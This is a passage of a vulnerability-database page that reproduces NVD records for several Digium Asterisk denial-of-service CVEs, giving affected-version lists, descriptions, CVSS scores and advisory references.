              "matchCriteriaId": "F82D4812-0429-42D4-BD27-C76CB9E7C368",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8FE11D6-8C0A-450E-B6DA-3AFE04D82232",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FBCC8-4637-4A67-BFFD-C052C3C03C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7307E10-9FA5-4940-B837-7936384F61DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3D0DC9D6-D4D6-46CB-98DA-F4FC1835B6B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBBD0747-F3FF-46D8-A3C4-8268E37BC5AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3F759F27-008E-47FB-AC0A-EF11DA19918E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D15C82BA-BD1F-4A19-A907-E6C30042F537",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E802481-C8BD-4218-8CDC-5DB112DA946C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C020CD-D0EA-4B3E-B33C-F900B08B28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0004AADE-1652-4242-A97D-E9818FE03CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "543E9C91-60FE-43AE-9B94-08DD730BA814",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "252849FA-F46E-4F5A-A488-AA53574CA884",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:digium:s800i:1.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "565444DE-F67C-4B6E-AC1E-92FC0D8A87CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:digium:s800i:1.3.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "80E356B2-4AEA-4532-A6F8-13B814BEB2C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:digium:s800i:1.3.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "60F261AB-3172-4245-8090-744294A0D08A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:digium:s800i:1.3.0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "A3DD6B08-D77D-4275-8F91-2CA47FF6E363",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b:-:business:*:*:*:*:*",
              "matchCriteriaId": "564A4529-997D-4615-BED8-AE3FB159689A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.1.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "FE9D66C4-F49D-4EC4-B5A9-24F28726A9B0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.1.3.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "BEFA5054-D5F9-4D07-9A66-D7AAD6953F5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.2.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "D110DCEB-F2F9-4600-B49F-22952C71B785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.2.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "3333A119-D92F-433C-BF5D-0037199256C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "19C44C33-EADA-48FD-A634-8066A003AFD0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "294A2BA2-26EB-40AD-B861-7FA9043CD097",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "4FAC61AF-BDF2-4397-A8F8-9D9155836E4C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.4:-:business:*:*:*:*:*",
              "matchCriteriaId": "33DE61C2-8C6A-4CD3-8D56-E70C4356CD50",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.5:-:business:*:*:*:*:*",
              "matchCriteriaId": "EECB5F75-BCE2-4777-933E-25EB5657750C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.6:-:business:*:*:*:*:*",
              "matchCriteriaId": "B5D51557-3E67-4C9A-9753-472D13FCA5C6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "C063FCFA-B1C3-4ACB-B9E7-B3FC973FD898",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "761DB3A3-1540-4976-AEB2-F8E45CCCC5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "B53CD2C1-9BF0-42F9-B3E3-2C9915E531C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "947F58B8-21AF-460B-8203-D2605A1F91D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c:-:business:*:*:*:*:*",
              "matchCriteriaId": "7CD989BE-8FA0-4EDB-8442-C2E12BD01D27",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "3FA908BA-BEF8-44A5-AC95-E7CF020D0C94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "78E8936C-033B-49E6-BB39-D5BBBC80EB55",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "rtp.c in Asterisk Open Source 1.2.x before 1.2.37, 1.4.x before 1.4.27.1, 1.6.0.x before 1.6.0.19, and 1.6.1.x before 1.6.1.11; Business Edition B.x.x before B.2.5.13, C.2.x.x before C.2.4.6, and C.3.x.x before C.3.2.3; and s800i 1.3.x before 1.3.0.6 allows remote attackers to cause a denial of service (daemon crash) via an RTP comfort noise payload with a long data length."
    },
    {
      "lang": "es",
      "value": "rtp.c en Asterisk Open Source v1.2.x anterior a v1.2.37, v1.4.x anterior a v1.4.27.1, v1.6.0.x anterior a v1.6.0.19, y v1.6.1.x anterior a v1.6.1.11; Business Edition B.x.x anterior a B.2.5.13, C.2.x.x anterior a C.2.4.6, y C.3.x.x anterior a C.3.2.3; y s800i v1.3.x anterior a v1.3.0.6 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda del demonio) a trav\u00e9s una carga \u00fatil del RTP ruido de confort con una larga longitud de datos."
    }
  ],
  "id": "CVE-2009-4055",
  "lastModified": "2024-11-21T01:08:49.793",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2009-12-02T11:30:00.517",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.2.diff.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.4.diff.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.0.diff.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.1.diff.txt"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2009-010.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/37530"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/37677"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/37708"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1023249"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2009/dsa-1952"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/60569"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.redhat.com/archives/fedora-package-announce/2009-December/msg00759.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/archive/1/508147/100/0/threaded"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/37153"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2009/3368"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54471"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://issues.asterisk.org/view.php?id=16242"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.2.diff.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.4.diff.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.0.diff.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.1.diff.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2009-010.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/37530"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/37677"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/37708"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1023249"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2009/dsa-1952"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/60569"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.redhat.com/archives/fedora-package-announce/2009-December/msg00759.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/archive/1/508147/100/0/threaded"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/37153"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2009/3368"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54471"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://issues.asterisk.org/view.php?id=16242"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2019-03-28 17:29

Modified

2024-11-21 04:47

Severity ?

6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Summary

An Integer Signedness issue (for a return code) in the res_pjsip_sdp_rtp module in Digium Asterisk versions 15.7.1 and earlier and 16.1.1 and earlier allows remote authenticated users to crash Asterisk via a specially crafted SDP protocol violation.

References

URL	Tags
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2019-001.html	Patch, Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-28260	Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2019-001.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-28260	Issue Tracking, Vendor Advisory

Impacted products

	Vendor	Product	Version
	digium	asterisk	*
	digium	asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "212B9BDD-ECC4-4CA3-B776-556C98EADF1D",
              "versionEndExcluding": "15.7.2",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "78874405-4758-4CC0-8BE0-ECC799BFF7B5",
              "versionEndExcluding": "16.2.1",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An Integer Signedness issue (for a return code) in the res_pjsip_sdp_rtp module in Digium Asterisk versions 15.7.1 and earlier and 16.1.1 and earlier allows remote authenticated users to crash Asterisk via a specially crafted SDP protocol violation."
    },
    {
      "lang": "es",
      "value": "Un error en la propiedad signedness de un n\u00famero entero (para c\u00f3digo devuelto) en el m\u00f3dulo res_pjsip_sdp_rtp en Digium Asterisk, en versiones 15.7.1 y anteriores y en las 16.1.1 y anteriores, permite a los atacantes remotos no autenticados cerrar inesperadamente Asterisk mediante una violaci\u00f3n de protocolo SDP especialmente manipulada."
    }
  ],
  "id": "CVE-2019-7251",
  "lastModified": "2024-11-21T04:47:50.583",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-03-28T17:29:01.723",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2019-001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28260"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2019-001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28260"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-190"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2021-02-18 20:15

Modified

2024-11-21 05:57

Severity ?

5.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in res_pjsip_session.c in Digium Asterisk through 13.38.1; 14.x, 15.x, and 16.x through 16.16.0; 17.x through 17.9.1; and 18.x through 18.2.0, and Certified Asterisk through 16.8-cert5. An SDP negotiation vulnerability in PJSIP allows a remote server to potentially crash Asterisk by sending specific SIP responses that cause an SDP negotiation failure.

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html	Third Party Advisory
cve@mitre.org	http://seclists.org/fulldisclosure/2021/Feb/61	Mailing List, Patch, Third Party Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/	Vendor Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2021-005.html	Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-29196	Issue Tracking, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2021/Feb/61	Mailing List, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2021-005.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-29196	Issue Tracking, Patch, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "37BA1B0D-474E-4F73-A329-F703C928C07D",
              "versionEndExcluding": "13.38.2",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7382B641-0396-456F-BF33-3F6412E35F2D",
              "versionEndExcluding": "16.16.1",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C5BA8606-ADA9-4841-A7E2-A9165138849A",
              "versionEndExcluding": "17.9.2",
              "versionStartIncluding": "17.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F10CB148-DF9C-4134-A417-3B111C036E20",
              "versionEndExcluding": "18.2.1",
              "versionStartIncluding": "18.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:-:*:*:*:*:*:*",
              "matchCriteriaId": "81C3E390-8B99-4EB8-82DD-02893611209A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "17DB2297-1908-4F87-8046-2BAA74569D71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CEA2CC40-C2F6-4828-82F0-1B50D3E61F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32F19F43-C1E8-4B6C-9356-AF355B7320BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "21D1FA32-B441-485F-8AE9-F3A394626909",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F7795CCF-B160-4B4F-9529-1192C11D7FDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "0C5E5D0D-9EB3-40FD-8B7E-E93A95D07AB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7DFDA30-DD61-4BBC-AFE4-448BF2A4F303",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "142F1F89-49AC-4A0B-A273-61F697063A5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "53041795-788C-4914-A2F6-41539ABE0244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FBB98E65-B2D0-49A4-8BF3-12155E3E13C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "769C854C-03CD-40A9-B39B-C0CDCA8252EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6D86AD6E-4E07-48B0-88D8-E18F277FFE6A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in res_pjsip_session.c in Digium Asterisk through 13.38.1; 14.x, 15.x, and 16.x through 16.16.0; 17.x through 17.9.1; and 18.x through 18.2.0, and Certified Asterisk through 16.8-cert5. An SDP negotiation vulnerability in PJSIP allows a remote server to potentially crash Asterisk by sending specific SIP responses that cause an SDP negotiation failure."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en el archivo res_pjsip_session.c en Digium Asterisk versiones hasta 13.38.1;\u0026#xa0;14.x, 15.x y 16.xa 16.16.0;\u0026#xa0;17.xa 17.9.1;\u0026#xa0;y 18.xa 18.2.0, y Certified Asterisk versiones hasta 16.8-cert5.\u0026#xa0;Una vulnerabilidad de negociaci\u00f3n SDP en PJSIP permite a un servidor remoto bloquear potencialmente Asterisk mediante el env\u00edo de respuestas SIP espec\u00edficas que causan un fallo en la negociaci\u00f3n SDP"
    }
  ],
  "id": "CVE-2021-26906",
  "lastModified": "2024-11-21T05:57:00.817",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 5.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-02-18T20:15:12.743",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Feb/61"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-005.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29196"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Feb/61"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-005.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29196"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-404"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-04-17 16:59

Modified

2024-11-21 02:58

Severity ?

